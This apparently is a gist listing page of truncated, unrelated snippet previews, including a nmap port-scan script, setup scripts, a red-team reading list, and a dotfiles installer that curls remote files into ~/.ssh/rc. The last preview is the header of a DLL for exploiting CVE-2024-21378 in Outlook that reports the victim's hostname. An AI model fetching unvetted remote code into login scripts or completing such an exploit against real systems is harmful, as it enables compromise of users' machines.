Security Advisories / Bulletins linked to Log4Shell (CVE-2021-44228)
- If you want to add a link, comment or send it to me
- Feel free to report any mistake directly below in the comment or in DM on Twitter @SwitHak
| # http://xael.org/norman/python/python-nmap | |
| # lets check for common ports using nmap | |
| import nmap | |
| nmScan = nmap.PortScanner() | |
| nmScan.scan('127.0.0.1', '0-1023') | |
| for port in nmScan['127.0.0.1']['tcp']: | |
| thisDict = nmScan['127.0.0.1']['tcp'][port] | |
| print 'Port ' + str(port) + ': ' + thisDict['product'] + ', v' + thisDict['version'] |
| . | |
| .. | |
| ........ | |
| @ | |
| * | |
| *.* | |
| *.*.* | |
| 🎠|
| #!/bin/bash | |
| # Base box setup steps | |
| # Do the steps below as root user | |
| sudo su | |
| # The steps below are based on a clean install on | |
| # CentOS 7 (build 1608) | |
| # http://cloud.centos.org/centos/7/images/CentOS-7-x86_64-GenericCloud-1608.raw.tar.gz |
| MD | |
| TermUrl | |
| a | |
| adjust_campaign | |
| alternatives | |
| amount | |
| app | |
| app_id | |
| appname | |
| avoid |
| From: http://redteams.net/bookshelf/ | |
| Techie | |
| Unauthorised Access: Physical Penetration Testing For IT Security Teams by Wil Allsopp. | |
| Social Engineering: The Art of Human Hacking by Christopher Hadnagy | |
| Practical Lock Picking: A Physical Penetration Tester's Training Guide by Deviant Ollam | |
| The Art of Deception: Controlling the Human Element of Security by Kevin Mitnick | |
| Hacking: The Art of Exploitation by Jon Erickson and Hacking Exposed by Stuart McClure and others. | |
| Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning by Fyodor | |
| The Shellcoder's Handbook: Discovering and Exploiting Security Holes by several authors |
Security Advisories / Bulletins linked to Log4Shell (CVE-2021-44228)
| #!/bin/bash | |
| set -e | |
| cd $HOME | |
| # install zsh and tmux | |
| sudo yum -y install git zsh tmux | |
| echo "setting antigen and zsh" | |
| curl -L git.io/antigen | sudo tee /opt/antigen.zsh |
| curl -fsSL \ | |
| "https://gist.github.com/mislav/5706063/raw/vimrc" -o ~/.vimrc \ | |
| "https://gist.github.com/mislav/5706063/raw/ssh_rc.sh" -o ~/.ssh/rc \ | |
| "https://gist.github.com/mislav/5706063/raw/tmux.conf" -o ~/.tmux.conf | |
| curl -fsSL "https://gist.github.com/wr00t/ede9ac998395415fd02898a5e63e2509/raw/zshrc" >> ~/.zshrc | |
| chmod +x ~/.ssh/rc |
| { | |
| "workbench.startupEditor": "newUntitledFile", | |
| "editor.fontSize": 14, | |
| "editor.lineHeight": 1.8, | |
| "javascript.suggest.autoImports": true, | |
| "javascript.updateImportsOnFileMove.enabled": "always", | |
| "editor.rulers": [80, 120], | |
| "extensions.ignoreRecommendations": true, | |
| "typescript.tsserver.log": "off", | |
| "files.associations": { |
| /** | |
| * This DLL is designed for use in conjunction with the Ruler tool for | |
| * security testing related to the CVE-2024-21378 vulnerability, | |
| * specifically targeting MS Outlook. | |
| * | |
| * It can be used with the following command line syntax: | |
| * ruler [auth-params] form add-com [attack-params] --dll ./test.dll | |
| * Ruler repository: https://github.com/NetSPI/ruler/tree/com-forms (com-forms branch). | |
| * | |
| * After being loaded into MS Outlook, it sends the PC's hostname and |